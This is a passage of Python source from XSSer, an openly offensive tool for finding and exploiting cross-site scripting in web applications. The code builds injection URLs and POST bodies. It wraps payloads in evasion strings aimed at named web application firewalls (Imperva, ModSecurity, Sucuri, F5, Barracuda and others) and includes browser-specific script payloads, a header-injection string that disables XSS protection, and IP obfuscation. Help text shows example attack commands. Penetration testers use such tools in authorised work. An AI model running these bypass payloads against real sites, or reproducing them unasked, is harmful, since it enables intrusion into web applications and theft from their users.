  495.                     payloads = payloads + payloads_dom
    496. 

  496.             elif options.dom:
    497. 

  497.                 payloads = payloads + payloads_dom
    498. 

  498.         elif options.dom:
    499. 

  499.             payloads = payloads_dom
    500. 

  500.         elif not options.fuzz and not options.dcp and not options.script and not options.hash and not options.inducedcode and not options.heuristic and not options.dom:
    501. 

  501.             payloads = [{"payload":'">PAYLOAD',
    502. 

  502. 			 "browser":"[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"
    503. 

  503.                          }]
    504. 

  504.         else:
    505. 

  505.             payloads = checker_payload
    506. 

  506.         return payloads
    507. 

  507. 

  508.     def process_ipfuzzing(self, text):
    509. 

  509.         """
    510. 

  510.         Mask ips in given text to DWORD
    511. 

  511.         """
    512. 

  512.         ips = re.findall("\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}", text)
    513. 

  513.         for ip in ips:
    514. 

  514.             text = text.replace(ip, str(self._ipDwordEncode(ip)))
    515. 

  515.         return text
    516. 

  516. 

  517.     def process_ipfuzzing_octal(self, text):
    518. 

  518.         """
    519. 

  519.        	Mask ips in given text to Octal
    520. 

  520. 	    """
    521. 

  521.         ips = re.findall("\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}", text)
    522. 

  522.         for ip in ips:
    523. 

  523.             text = text.replace(ip, str(self._ipOctalEncode(ip)))
    524. 

  524.         return text
    525. 

  525. 

  526.     def process_payloads_ipfuzzing(self, payloads):
    527. 

  527.         """
    528. 

  528.         Mask ips for all given payloads using DWORD
    529. 

  529.         """
    530. 

  530.         # ip fuzzing (DWORD)
    531. 

  531.         if self.options.Dwo:
    532. 

  532.             resulting_payloads = []
    533. 

  533.             for payload in payloads:
    534. 

  534.                 payload["payload"] = self.process_ipfuzzing(payload["payload"])
    535. 

  535.                 resulting_payloads.append(payload)
    536. 

  536.             return resulting_payloads
    537. 

  537.         return payloads
    538. 

  538. 

  539.     def process_payloads_ipfuzzing_octal(self, payloads):
    540. 

  540.         """
    541. 

  541.         Mask ips for all given payloads using OCTAL
    542. 

  542.         """
    543. 

  543.         # ip fuzzing (OCTAL)
    544. 

  544.         if self.options.Doo:
    545. 

  545.             resulting_payloads = []
    546. 

  546.             for payload in payloads:
    547. 

  547.                 payload["payload"] = self.process_ipfuzzing_octal(payload["payload"])
    548. 

  548.                 resulting_payloads.append(payload)
    549. 

  549.             return resulting_payloads
    550. 

  550.         return payloads
    551. 

  551. 

  552.     def get_query_string(self):
    553. 

  553.         """
    554. 

  554.         Get the supplied query string.
    555. 

  555.         """
    556. 

  556.         if self.options.postdata:
    557. 

  557.             return self.options.postdata
    558. 

  558.         elif self.options.getdata:
    559. 

  559.             return self.options.getdata
    560. 

  560.         return ""
    561. 

  561. 

  562.     def attack_url(self, url, payloads, query_string):
    563. 

  563.         """
    564. 

  564.         Attack the given url checking or not if is correct.
    565. 

  565.         """
    566. 

  566.         if not self.options.nohead:
    567. 

  567.             for payload in payloads:
    568. 

  568.                 self.rounds = self.rounds + 1
    569. 

  569.                 self.attack_url_payload(url, payload, query_string)
    570. 

  570.         else:
    571. 

  571.             hc = Curl()
    572. 

  572.             try:
    573. 

  573.                 urls = hc.do_head_check([url])
    574. 

  574.             except:
    575. 

  575.                 self.report("[Error] Target URL: (" + url + ") is malformed!" + " [DISCARDED]" + "\n")
    576. 

  576.                 return
    577. 

  577.             self.report("-"*50 + "\n")
    578. 

  578.             if str(hc.info()["http-code"]) in ["200", "302", "301", "401"]:
    579. 

  579.                 if str(hc.info()["http-code"]) in ["301"]:
    580. 

  580.                     url = str(hc.info()["Location"])
    581. 

  581.                     payload = ""
    582. 

  582.                     query_string = ""
    583. 

  583.                 elif str(hc.info()["http-code"]) in ["302"]:
    584. 

  584.                     url = url + "/"
    585. 

  585.                     payload = ""
    586. 

  586.                     query_string = ""
    587. 

  587.                 self.success_connection = self.success_connection + 1
    588. 

  588.                 self.report("[Info] HEAD-CHECK: OK! [HTTP-" + hc.info()["http-code"] + "] -> [AIMED]\n")
    589. 

  589.                 for payload in payloads:
    590. 

  590.                     self.attack_url_payload(url, payload, query_string)
    591. 

  591.             else:
    592. 

  592.                 if str(hc.info()["http-code"]) in ["405"]:
    593. 

  593.                     self.report("[Info] HEAD-CHECK: NOT ALLOWED! [HTTP-" + hc.info()["http-code"] + "] -> [PASSING]\n")
    594. 

  594.                     self.success_connection = self.success_connection + 1
    595. 

  595.                     for payload in payloads:
    596. 

  596.                         self.attack_url_payload(url, payload, query_string)
    597. 

  597.                 else:
    598. 

  598.                     self.not_connection = self.not_connection + 1
    599. 

  599.                     self.report("[Error] HEAD-CHECK: FAILED! [HTTP-" + hc.info()["http-code"] + "] -> [DISCARDED]\n")
    600. 

  600.             self.report("-"*50 + "\n")
    601. 

  601. 

  602.     def not_keyword_exit(self):
    603. 

  603.         self.report("="*30)
    604. 

  604.         self.report("\n[Error] XSSer cannot find a correct place to start an attack. Aborting!...\n")
    605. 

  605.         self.report("-"*25)
    606. 

  606.         self.report("\n[Info] This is because you aren't providing:\n\n At least one -payloader- using a keyword: 'XSS' (for hex.hash) or 'X1S' (for int.hash):\n")
    607. 

  607.         self.report("  - ex (GET): xsser -u 'https://target.com' -g '/path/profile.php?username=bob&surname=XSS&age=X1S&job=XSS'")
    608. 

  608.         self.report("  - ex (POST): xsser -u 'https://target.com/login.php' -p 'username=bob&password=XSS&captcha=X1S'\n")
    609. 

  609.         self.report(" Any extra attack(s) (Xsa, Xsr, Coo, Dorker, Crawler...):\n")
    610. 

  610.         self.report("  - ex (GET+Cookie): xsser -u 'https://target.com' -g '/path/id.php?=2' --Coo")
    611. 

  611.         self.report("  - ex (POST+XSA+XSR+Cookie): xsser -u 'https://target.com/login.php' -p 'username=admin&password=admin' --Xsa --Xsr --Coo")
    612. 

  612.         self.report("  - ex (Dorker): xsser -d 'news.php?id=' --Da")
    613. 

  613.         self.report("  - ex (Crawler): xsser -u 'https://target.com' -c 100 --Cl\n")
    614. 

  614.         self.report(" Or a mixture:\n")
    615. 

  615.         self.report("  - ex (GET+Manual): xsser -u 'https://target.com' -g '/users/profile.php?user=XSS&salary=X1S' --payload='<script>alert(XSS);</script>'")
    616. 

  616.         self.report("  - ex (POST+Manual): xsser -u 'https://target.com/login.asp' -p 'username=bob&password=XSS' --payload='}}%%&//<sc&ri/pt>(XSS)--;>'\n")
    617. 

  617.         self.report("  - ex (GET+Cookie): xsser -u 'https://target.com' -g '/login.asp?user=bob&password=XSS' --Coo")
    618. 

  618.         self.report("  - ex (POST+XSR+XSA): xsser -u 'https://target.com/login.asp' -p 'username=bob&password=XSS' --Xsr --Xsa\n")
    619. 

  619.         self.report("="*75 + "\n")
    620. 

  620.         if not self.options.xsser_gtk:
    621. 

  621.             sys.exit(2)
    622. 

  622.         else:
    623. 

  623.             pass
    624. 

  624. 

  625.     def get_url_payload(self, url, payload, query_string, user_attack_payload):
    626. 

  626.         """
    627. 

  627.         Attack the given url with the given payload
    628. 

  628.         """
    629. 

  629.         options = self.options
    630. 

  630.         self._ongoing_attacks = {}
    631. 

  631.         if (self.options.xsa or self.options.xsr or self.options.coo):
    632. 

  632.             agent, referer, cookie  = self._prepare_extra_attacks(payload)
    633. 

  633.         else:
    634. 

  634.             agents = [] # user-agents
    635. 

  635.             try:
    636. 

  636.                 f = open("core/fuzzing/user-agents.txt").readlines() # set path for user-agents
    637. 

  637.             except:
    638. 

  638.                 f = open("fuzzing/user-agents.txt").readlines() # set path for user-agents when testing
    639. 

  639.             for line in f:
    640. 

  640.                 agents.append(line)
    641. 

  641.             agent = random.choice(agents).strip() # set random user-agent
    642. 

  642.             referer = "127.0.0.1"
    643. 

  643.             cookie = None
    644. 

  644. 

  645.         if options.agent:
    646. 

  646.             agent = options.agent
    647. 

  647.         else:
    648. 

  648.             self.options.agent = agent
    649. 

  649.         if options.referer:
    650. 

  650.             referer = options.referer
    651. 

  651.         else:
    652. 

  652.             self.options.referer = referer
    653. 

  653.         if options.cookie:
    654. 

  654.             cookie = options.cookie
    655. 

  655.         else:
    656. 

  656.             self.options.cookie = cookie
    657. 

  657. 

  658.         # get payload/vector
    659. 

  659.         payload_string = payload['payload'].strip()
    660. 

  660.   
    661. 

  661.         ### Anti-antiXSS exploits
    662. 

  662.         # PHPIDS (>0.6.5) [ALL] -> 32*payload + payload
    663. 

  663.         if options.phpids065:
    664. 

  664.             payload_string = 32*payload_string + payload_string
    665. 

  665. 

  666.         # PHPIDS (>0.7) [ALL] -> payload: 'svg-onload' (23/04/2016)
    667. 

  667.         if options.phpids070:
    668. 

  668.             payload_string = '<svg+onload=+"'+payload_string+'">'
    669. 

  669. 

  670.         # Imperva Incapsula [ALL] -> payload: 'img onerror' + payload[DoubleURL+HTML+Unicode] 18/02/2016 
    671. 

  671.         if options.imperva:
    672. 

  672.             payload_string = '<img src=x onerror="'+payload_string+'">'
    673. 

  673. 

  674.         # WebKnight (>4.1) [Chrome] payload: 'details ontoggle' 18/02/2016 
    675. 

  675.         if options.webknight:
    676. 

  676.             payload_string = '<details ontoggle='+payload_string+'>'
    677. 

  677. 

  678.         # F5BigIP [Chrome+FF+Opera] payload: 'onwheel' 18/02/2016 
    679. 

  679.         if options.f5bigip:
    680. 

  680.             payload_string = '<body style="height:1000px" onwheel="'+payload_string+'">'
    681. 

  681.  
    682. 

  682.         # Barracuda WAF [ALL] payload: 'onwheel' 18/02/2016 
    683. 

  683.         if options.barracuda:
    684. 

  684.             payload_string = '<body style="height:1000px" onwheel="'+payload_string+'">'
    685. 

  685. 

  686.         # Apache / modsec [ALL] payload: special 18/02/2016 
    687. 

  687.         if options.modsec:
    688. 

  688.             payload_string = '<b/%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35mouseover='+payload_string+'>'
    689. 

  689. 

  690.         # QuickDefense [Chrome] payload: 'ontoggle' + payload[Unicode] 18/02/2016 
    691. 

  691.         if options.quickdefense:
    692. 

  692.             payload_string = '<details ontoggle="'+payload_string+'">'
    693. 

  693.         
    694. 

  694.         # SucuriWAF [ALL] payload: 'ontoggle' + payload[Unicode] 18/02/2016 
    695. 

  695.         if options.sucuri:
    696. 

  696.            payload_string = '<a+id="a"href=javascript%26colon;alert%26lpar;'+payload_string+'%26rpar;+id="a" style=width:100%25;height:100%25;position:fixed;left:0;top:0 x>Y</a>'
    697. 

  697. 

  698.         # Firefox 12 (and below) # 09/2019
    699. 

  699.         if options.firefox:
    700. 

  700.             payload_string = "<script type ='text/javascript'>"+payload_string+"</script>"
    701. 

  701. 

  702.         # Chrome 19 (and below, but also Firefox 12 and below) # 09/2019
    703. 

  703.         if options.chrome:
    704. 

  704.             payload_string = "<script>/*///*/"+payload_string+"</script>"
    705. 

  705. 

  706.         # Internet Explorer 9 (but also Firefox 12 and below) # 09/2019
    707. 

  707.         if options.iexplorer:
    708. 

  708.             payload_string = 'cooki1%3dvalue1;%0d%0aX-XSS-Protection:0%0d%0a%0d%0a<html><body><script>'+payload_string+'</script></body></html>'
    709. 

  709. 

  710.         # Opera 10.6 (but also IE6) # 09/2019
    711. 

  711.         if options.opera:
    712. 

  712.             payload_string = "<Table background = javascript: alert ("+payload_string+")> </ table>"
    713. 

  713. 

  714.         # Substitute the attacking hash
    715. 

  715.         if 'PAYLOAD' in payload_string or 'VECTOR' in payload_string:
    716. 

  716.             payload_string = payload_string.replace('PAYLOAD', self.DEFAULT_XSS_PAYLOAD)
    717. 

  717.             payload_string = payload_string.replace('VECTOR', self.DEFAULT_XSS_PAYLOAD)
    718. 

  718. 

  719.         hashed_payload = payload_string
    720. 

  720. 

  721.         # Imperva
    722. 

  722.         if options.imperva:
    723. 

  723.             hashed_payload = urllib.parse.urlencode({'':hashed_payload})
    724. 

  724.             hashed_payload = urllib.parse.urlencode({'':hashed_payload}) #DoubleURL encoding
    725. 

  725.             hashed_payload = cgi.escape(hashed_payload) # + HTML encoding
    726. 

  726.             hashed_payload = str(hashed_payload) # + Unicode
    727. 

  727. 

  728.         # Quick Defense
    729. 

  729.         if options.quickdefense:
    730. 

  730.             hashed_payload = str(hashed_payload) # + Unicode
    731. 

  731. 

  732.         # apply user final attack url payload
    733. 

  733.         if user_attack_payload:
    734. 

  734.             hashed_vector_url = self.encoding_permutations(user_attack_payload)
    735. 

  735.         else:
    736. 

  736.             hashed_vector_url = self.encoding_permutations(hashed_payload)
    737. 

  737. 

  738.         # replace special payload string also for extra attacks
    739. 

  739.         if self.extra_hashed_injections:
    740. 

  740.             hashed_payload = hashed_payload.replace('XSS', 'PAYLOAD')
    741. 

  741.             for k, v in self.extra_hashed_injections.items():
    742. 

  742.                 if v[1] in hashed_payload:
    743. 

  743.                     self.extra_hashed_vector_url[k] = v[0], hashed_payload
    744. 

  744.             self.extra_hashed_injections = self.extra_hashed_vector_url
    745. 

  745.         if not options.getdata: # using GET as a single input (-u)
    746. 

  746.             target_url = url
    747. 

  747.         else:
    748. 

  748.             if not url.endswith("/") and not options.getdata.startswith("/"):
    749. 

  749.                 url = url + "/"
    750. 

  750.             target_url = url + options.getdata
    751. 

  751.         p_uri = urlparse(target_url)
    752. 

  752.         uri = p_uri.netloc
    753. 

  753.         path = p_uri.path
    754. 

  754.         if not uri.endswith('/') and not path.startswith('/'):
    755. 

  755.             uri = uri + "/"
    756. 

  756.         if self.options.target or self.options.crawling: # for audit entire target allows target without 'XSS/X1S' keyword
    757. 

  757.             if not "XSS" in target_url:
    758. 

  758.                 if not target_url.endswith("/"):
    759. 

  759.                     target_url = target_url + "/XSS"
    760. 

  760.                 else:
    761. 

  761.                     target_url = target_url + "XSS"
    762. 

  762.         target_params = parse_qs(urlparse(target_url).query, keep_blank_values=True)
    763. 

  763.         if self.options.script:
    764. 

  764.             if not 'XSS' in self.options.script and not self.options.crawling: # 'XSS' keyword used to change PAYLOAD at target_params
    765. 

  765.                 self.not_keyword_exit()
    766. 

  766.         if not target_params and not options.postdata:
    767. 

  767.             if not self.options.xsa and not self.options.xsr and not self.options.coo: # extra attacks payloads
    768. 

  768.                 if not 'XSS' in target_url and not 'X1S' in target_url and not self.options.crawling: # not any payloader found!
    769. 

  769.                     self.not_keyword_exit()
    770. 

  770.                 else: # keyword found at target url (ex: https://target.com/XSS)
    771. 

  771.                     if 'XSS' in target_url:
    772. 

  772.                         url_orig_hash = self.generate_hash('url') # new hash for each parameter with an injection
    773. 

  773.                     elif 'X1S' in target_url:
    774. 

  774.                         url_orig_hash = self.generate_numeric_hash() # new hash for each parameter with an injection
    775. 

  775.                     hashed_payload = payload_string.replace('XSS', url_orig_hash)
    776. 

  776.                     if "[B64]" in hashed_payload: # [DCP Injection]
    777. 

  777.                         dcp_payload = hashed_payload.split("[B64]")[1]
    778. 

  778.                         dcp_preload = hashed_payload.split("[B64]")[0]
    779. 

  779.                         dcp_payload = b64encode(dcp_payload)
    780. 

  780.                         hashed_payload = dcp_preload + dcp_payload
    781. 

  781.                     self.hashed_injections[url_orig_hash] = target_url
    782. 

  782.                     if user_attack_payload:
    783. 

  783.                         pass
    784. 

  784.                     else:
    785. 

  785.                         hashed_vector_url = self.encoding_permutations(hashed_payload)
    786. 

  786.                     target_params[''] = hashed_vector_url # special target_param when XSS only at target_url
    787. 

  787.                     target_url_params = urllib.parse.urlencode(target_params)
    788. 

  788.                     if not uri.endswith('/') and not path.startswith('/'):
    789. 

  789.                         uri = uri + "/"
    790. 

  790.                     dest_url = p_uri.scheme + "://" + uri + path
    791. 

  791.                     if not "XSS" in dest_url:
    792. 

  792.                         if not dest_url.endswith("/"):
    793. 

  793.                             dest_url = dest_url + "/" + hashed_vector_url
    794. 

  794.                         else:
    795. 

  795.                             dest_url = dest_url + hashed_vector_url
    796. 

  796.                     else:
    797. 

  797.                         if 'XSS' in dest_url:
    798. 

  798.                             dest_url = dest_url.replace('XSS', hashed_vector_url)
    799. 

  799.                         if 'X1S' in dest_url:
    800. 

  800.                             dest_url = dest_url.replace('X1S', hashed_vector_url)
    801. 

  801.             else:
    802. 

  802.                 if 'XSS' in target_url:
    803. 

  803.                     url_orig_hash = self.generate_hash('url') # new hash for each parameter with an injection
    804. 

  804.                 elif 'X1S' in target_url:
    805. 

  805.                     url_orig_hash = self.generate_numeric_hash() # new hash for each parameter with an injection
    806. 

  806.                 hashed_payload = payload_string.replace('XSS', url_orig_hash)
    807. 

  807.                 if "[B64]" in hashed_payload: # [DCP Injection]
    808. 

  808.                     dcp_payload = hashed_payload.split("[B64]")[1]
    809. 

  809.                     dcp_preload = hashed_payload.split("[B64]")[0]
    810. 

  810.                     dcp_payload = b64encode(dcp_payload)
    811. 

  811.                     hashed_payload = dcp_preload + dcp_payload
    812. 

  812.                 self.hashed_injections[url_orig_hash] = target_url
    813. 

  813.                 if user_attack_payload:
    814. 

  814.                     pass
    815. 

  815.                 else:
    816. 

  816.                     hashed_vector_url = self.encoding_permutations(hashed_payload)
    817. 

  817.                 target_params[''] = hashed_vector_url # special target_param when XSS only at target_url
    818. 

  818.                 target_url_params = urllib.parse.urlencode(target_params)
    819. 

  819.                 if not uri.endswith('/') and not path.startswith('/'):
    820. 

  820.                     uri = uri + "/"
    821. 

  821.                 dest_url = p_uri.scheme + "://" + uri + path
    822. 

  822.                 if 'XSS' in dest_url:
    823. 

  823.                     dest_url = dest_url.replace('XSS', hashed_vector_url)
    824. 

  824.                 if 'X1S' in dest_url:
    825. 

  825.                     dest_url = dest_url.replace('X1S', hashed_vector_url)
    826. 

  826.                 dest_url = p_uri.scheme + "://" + uri + path + "?" + target_url_params
    827. 

  827.         else:
    828. 

  828.             if not options.postdata:
    829. 

  829.                 r = 0
    830. 

  830.                 for key, value in target_params.items(): # parse params searching for keywords
    831. 

  831.                     for v in value:
    832. 

  832.                         if v == 'XSS' or v == 'X1S': # user input keywords where inject a payload
    833. 

  833.                             if v == 'XSS':
    834. 

  834.                                 url_orig_hash = self.generate_hash('url') # new hash for each parameter with an injection
    835. 

  835.                             elif v == 'X1S':
    836. 

  836.                                 url_orig_hash = self.generate_numeric_hash() # new hash for each parameter with an injection
    837. 

  837.                             hashed_payload = payload_string.replace('XSS', url_orig_hash)
    838. 

  838.                             if "[B64]" in hashed_payload: # [DCP Injection]
    839. 

  839.                                 dcp_payload = hashed_payload.split("[B64]")[1]
    840. 

  840.                                 dcp_preload = hashed_payload.split("[B64]")[0]
    841. 

  841.                                 dcp_payload = b64encode(dcp_payload)
    842. 

  842.                                 hashed_payload = dcp_preload + dcp_payload
    843. 

  843.                             self.hashed_injections[url_orig_hash] = key
    844. 

  844.                             if user_attack_payload:
    845. 

  845.                                 pass
    846. 

  846.                             else:
    847. 

  847.                                 hashed_vector_url = self.encoding_permutations(hashed_payload)
    848. 

  848.                             target_params[key] = hashed_vector_url
    849. 

  849.                             r = r + 1
    850. 

  850.                         else:
    851. 

  851.                             if self.options.xsa or self.options.xsr or self.options.coo:
    852. 

  852.                                 url_orig_hash = self.generate_hash('url') # new hash for each parameter with an injection
    853. 

  853.                                 self.hashed_injections[url_orig_hash] = key
    854. 

  854.                                 target_params[key] = v
    855. 

  855.                                 r = r + 1
    856. 

  856.                             else:
    857. 

  857.                                 target_params[key] = v
    858. 

  858.                 if r == 0 and not self.options.xsa and not self.options.xsr and not self.options.coo and not self.options.crawling:
    859. 

  859.                     self.not_keyword_exit()
    860. 

  860.                 payload_url = query_string.strip() + hashed_vector_url
    861. 

  861.                 target_url_params = urllib.parse.urlencode(target_params)
    862. 

  862.                 dest_url = p_uri.scheme + "://" + uri + path + "?" + target_url_params
    863. 

  863.             else: # using POST provided by parameter (-p)
    864. 

  864.                 target_params = parse_qs(query_string, keep_blank_values=True)
    865. 

  865.                 r = 0
    866. 

  866.                 for key, value in target_params.items(): # parse params searching for keywords
    867. 

  867.                     for v in value:
    868. 

  868.                         if v == 'XSS' or v == 'X1S': # user input keywords where inject a payload
    869. 

  869.                             if v == 'XSS':
    870. 

  870.                                 url_orig_hash = self.generate_hash('url') # new hash for each parameter with an injection
    871. 

  871.                             elif v == 'X1S':
    872. 

  872.                                 url_orig_hash = self.generate_numeric_hash() # new hash for each parameter with an injection
    873. 

  873.                             hashed_payload = payload_string.replace('XSS', url_orig_hash)
    874. 

  874.                             if "[B64]" in hashed_payload: # [DCP Injection]
    875. 

  875.                                 dcp_payload = hashed_payload.split("[B64]")[1]
    876. 

  876.                                 dcp_preload = hashed_payload.split("[B64]")[0]
    877. 

  877.                                 dcp_payload = b64encode(dcp_payload)
    878. 

  878.                                 hashed_payload = dcp_preload + dcp_payload
    879. 

  879.                             self.hashed_injections[url_orig_hash] = key
    880. 

  880.                             if user_attack_payload:
    881. 

  881.                                 pass
    882. 

  882.                             else:
    883. 

  883.                                 hashed_vector_url = self.encoding_permutations(hashed_payload)
    884. 

  884.                             target_params[key] = hashed_vector_url
    885. 

  885.                             r = r + 1
    886. 

  886.                         else:
    887. 

  887.                             if self.options.xsa or self.options.xsr or self.options.coo:
    888. 

  888.                                 url_orig_hash = self.generate_hash('url') # new hash for each parameter with an injection
    889. 

  889.                                 self.hashed_injections[url_orig_hash] = key
    890. 

  890.                                 target_params[key] = v
    891. 

  891.                                 r = r + 1
    892. 

  892.                             else:
    893. 

  893.                                 target_params[key] = v
    894. 

  894.                 if r == 0 and not self.options.xsa and not self.options.xsr and not self.options.coo and not self.options.crawling:
    895. 

  895.                     self.not_keyword_exit()
    896. 

  896.                 target_url_params = urllib.parse.urlencode(target_params)
    897. 

  897.                 dest_url = target_url_params
    898. 

  898.         self._ongoing_attacks['url'] = url_orig_hash
    899. 

  899.         return dest_url, agent, referer, cookie
    900. 

  900. 

  901.     def attack_url_payload(self, url, payload, query_string):
    902. 

  902.         if not self.pool:
    903. 

  903.             pool = self.mothership.pool
    904. 

  904.         else:
    905. 

  905.             pool = self.pool
    906. 

  906.         c = Curl()
    907. 

  907.         if self.options.getdata or not self.options.postdata:
    908. 

  908.             dest_url, agent, referer, cookie = self.get_url_payload(url, payload, query_string, None)
    909. 

  909.             def _cb(request, result):
    910. 

  910.                 self.finish_attack_url_payload(c, request, result, payload,
    911. 

  911.                                                query_string, url, dest_url)
    912. 

  912.             _error_cb = self.error_attack_url_payload
    913. 

  913.             def _error_cb(request, error):
    914. 

  914.                 self.error_attack_url_payload(c, url, request, error)
    915. 

  915.             c.agent = agent
    916. 

  916.             c.referer = referer
    917. 

  917.             c.cookie = cookie
    918. 

  918.             if " " in dest_url: # parse blank spaces
    919. 

  919.                 dest_url = dest_url.replace(" ", "+")
    920. 

  920.             pool.addRequest(c.get, [[dest_url]], _cb, _error_cb)
    921. 

  921.             self._ongoing_requests += 1
    922. 

  922.         if self.options.postdata:
    923. 

  923.             dest_url, agent, referer, cookie = self.get_url_payload("", payload, query_string, None)
    924. 

  924.             def _cb(request, result):
    925. 

  925.                 self.finish_attack_url_payload(c, request, result, payload,
    926. 

  926.                                                query_string, url, dest_url)
    927. 

  927.             _error_cb = self.error_attack_url_payload
    928. 

  928.             def _error_cb(request, error):
    929. 

  929.                 self.error_attack_url_payload(c, url, request, error)
    930. 

  930.             dest_url = dest_url.strip().replace("/", "", 1)
    931. 

  931.             c.agent = agent
    932. 

  932.             c.referer = referer
    933. 

  933.             c.cookie = cookie
    934. 

  934.             pool.addRequest(c.post, [[url, dest_url]], _cb, _error_cb)
    935. 

  935.             self._ongoing_requests += 1
    936. 

  936. 

  937. 

  938.     def error_attack_url_payload(self, c, url, request, error):
    939. 

  939.         self._ongoing_requests -= 1
    940. 

  940.         for reporter in self._reporters:
    941. 

  941.             reporter.mosquito_crashed(url, str(error[0]))
    942. 

  942.         dest_url = request.args[0]
    943. 

  943.         self.report("Failed attempt (URL Malformed!?): " + url + "\n")
    944. 

  944.         self.urlmalformed = True
    945. 

  945.         if self.urlmalformed == True and self.urlspoll[0] == url:
    946. 

  946.             self.land()
    947. 

  947.         self.report(str(error[0]))
    948. 

  948.         if self.options.verbose:
    949. 

  949.             traceback.print_tb(error[2])
    950. 

  950.         c.close()
    951. 

  951.         del c
    952. 

  952.         return
    953. 

  953. 

  954.     def finish_attack_url_payload(self, c, request, result, payload,
    955. 

  955.                                   query_string, url, dest_url):
    956. 

  956.         self.round_complete = self.round_complete + 1
    957. 

  957.         self.report("="*75)
    958. 

  958.         self.report("[*] Test: [ "+str(self.round_complete)+"/"+str(self.rounds)+" ] <-> "+str(self.time))
    959. 

  959.         self.report("="*75)
    960. 

  960.         self.report("\n[+] Target: \n\n [ "+ str(url) + " ]\n")
    961. 

  961.         self._ongoing_requests -= 1
    962. 

  962.         # adding constant head check number flag
    963. 

  963.         if self.options.isalive:
    964. 

  964.             self.flag_isalive_num = int(self.options.isalive)
    965. 

  965.         if not self.options.isalive:
    966. 

  966.            pass
    967. 

  967.         elif self.options.isalive and not self.options.nohead:
    968. 

  968.             self.errors_isalive = self.errors_isalive + 1
    969. 

  969.             if self.errors_isalive > self.options.isalive:
    970. 

  970.                 pass
    971. 

  971.             else:
    972. 

  972.                 self.report("---------------------")
    973. 

  973.                 self.report("Alive Checker for: " + url + " - [", self.errors_isalive, "/", self.options.isalive, "]\n")
    974. 

  974.             if self.next_isalive == True:
    975. 

  975.                 hc = Curl()
    976. 

  976.                 self.next_isalive = False
    977. 

  977.                 try:
    978. 

  978.                     urls = hc.do_head_check([url])
    979. 

  979.                 except:
    980. 

  980.                     print("[Error] Target url: (" + url + ") is unaccesible!" + " [DISCARDED]" + "\n")
    981. 

  981.                     self.errors_isalive = 0
    982. 

  982.                     return
    983. 

  983.                 if str(hc.info()["http-code"]) in ["200", "302", "301", "401"]:
    984. 

  984.                     print("HEAD alive check: OK" + "(" + hc.info()["http-code"] + ")\n")
    985. 

  985.                     print("- Your target still Alive: " + "(" + url + ")")
    986. 

  986.                     print("- If you are receiving continuous 404 errors requests on your injections but your target is alive is because:\n")
    987. 

  987.                     print("          - your injections are failing: normal :-)")
    988. 

  988.                     print("          - maybe exists some IPS/NIDS/... systems blocking your requests!\n")
    989. 

  989.                 else:
    990. 

  990.                     if str(hc.info()["http-code"]) == "0":
    991. 

  991.                         print("\n[Error] Target url: (" + url + ") is unaccesible!" + " [DISCARDED]" + "\n")
    992. 

  992.                     else:
    993. 

  993.                         print("HEAD alive check: FAILED" + "(" + hc.info()["http-code"] + ")\n")
    994. 

  994.                         print("- Your target " + "(" + url + ")" + " looks that is NOT alive")
    995. 

  995.                         print("- If you are receiving continuous 404 errors requests on payloads\n  and this HEAD pre-check request is giving you another 404\n  maybe is because; target is down, url malformed, something is blocking you...\n- If you haven't more than one target then try to; STOP THIS TEST!!\n")
    996. 

  996.                 self.errors_isalive = 0
    997. 

  997.             else:
    998. 

  998.                 if str(self.errors_isalive) >= str(self.options.isalive):
    999. 

  999.                     self.report("---------------------")
    1000. 

  1000.                     self.report("\nAlive System: XSSer is checking if your target still alive. [Waiting for reply...]\n")
    1001. 

  1001.                     self.next_isalive = True
    1002. 

  1002.                     self.options.isalive = self.flag_isalive_num
    1003. 

  1003.         else:
    1004. 

  1004.             if self.options.isalive and self.options.nohead:
    1005. 

  1005.                 self.report("---------------------")
    1006. 

  1006.                 self.report("Alive System DISABLED!: XSSer is using a pre-check HEAD request per target by default to perform better accurance on tests\nIt will check if target is alive before inject all the payloads. try (--no-head) with (--alive <num>) to control this checker limit manually")
    1007. 

  1007.                 self.report("---------------------")
    1008. 

  1008.         # check results an alternative url, choosing method and parameters, or not
    1009. 

  1009.         if self.options.altm == None or self.options.altm not in ["GET", "POST", "post"]:
    1010. 

  1010.             self.options.altm = "GET"
    1011. 

  1011.         if self.options.altm == "post":
    1012. 

  1012.             self.options.altm = "POST"
    1013. 

  1013.         if self.options.alt == None:
    1014. 

  1014.             pass
    1015. 

  1015.         else:
    1016. 

  1016.             self.report("="*45)
    1017. 

  1017.             self.report("[+] Checking Response Options:", "\n")
    1018. 

  1018.             self.report("[+] Url:", self.options.alt)
    1019. 

  1019.             self.report("[-] Method:", self.options.altm)
    1020. 

  1020.             if self.options.ald:
    1021. 

  1021.                 self.report("[-] Parameter(s):", self.options.ald, "\n")
    1022. 

  1022.             else:
    1023. 

  1023.                 self.report("[-] Parameter(s):", query_string, "\n")
    1024. 

  1024.         if c.info()["http-code"] in ["200", "302", "301"]:
    1025. 

  1025.             if self.options.statistics:
    1026. 

  1026.                 self.success_connection = self.success_connection + 1
    1027. 

  1027.             self._report_attack_success(c, dest_url, payload,
    1028. 

  1028.                                         query_string, url)
    1029. 

  1029.         else:
    1030. 

  1030.             self._report_attack_failure(c, dest_url, payload,
    1031. 

  1031.                                         query_string, url)
    1032. 

  1032.         # checking response results 
    1033. 

  1033.         if self.options.alt == None:
    1034. 

  1034.             pass
    1035. 

  1035.         else:
    1036. 

  1036.             self.report("="*45)
    1037. 

  1037.             self.report("[+] Checking Response Results:", "\n")
    1038. 

  1038.             self.report("Searching using", self.options.altm, "for:", orig_hash, "on alternative url")
    1039. 

  1039.             if 'PAYLOAD' in payload['payload']:
    1040. 

  1040.                 user_attack_payload = payload['payload'].replace('PAYLOAD', orig_hash)
    1041. 

  1041.             if self.options.ald:
    1042. 

  1042.                 query_string = self.options.ald
    1043. 

  1043.             if "VECTOR" in self.options.alt:
    1044. 

  1044.                 dest_url = self.options.alt
    1045. 

  1045.             else:
    1046. 

  1046.                 if not dest_url.endswith("/"):
    1047. 

  1047.                     dest_url = dest_url + "/"
    1048. 

  1048.             if self.options.altm == 'POST':
    1049. 

  1049.                 dest_url = "" + query_string + user_attack_payload
    1050. 

  1050.                 dest_url = dest_url.strip().replace("/", "", 1)
    1051. 

  1051.                 data = c.post(url, dest_url)
    1052. 

  1052.             else:
    1053. 

  1053.                 dest_url = self.options.alt + query_string + user_attack_payload
    1054. 

  1054.                 c.get(dest_url)
    1055. 

